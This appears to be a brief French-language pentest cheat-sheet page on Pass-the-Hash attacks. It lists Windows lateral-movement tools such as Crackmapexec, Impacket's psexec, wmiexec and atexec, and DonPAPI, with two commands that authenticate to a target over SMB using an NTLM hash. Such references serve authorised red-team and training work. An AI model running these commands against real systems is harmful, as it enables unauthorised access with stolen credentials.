🔪Pass The Hash
SharpHashSpray
SMB
Crackmapexec
crackmapexec smb <target IP> -u '<username>' -H '<hash>'Impacket
Psexec
psexec.py
python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 <username>@<target IP>WMI
wmiexec.py
RPC
rpcdump.py
Exécution de commandes à distance
atexec.py
Lookupsid.py
Samrdump.py
reg.py
DonPAPI
PTH Toolkit
Mis à jour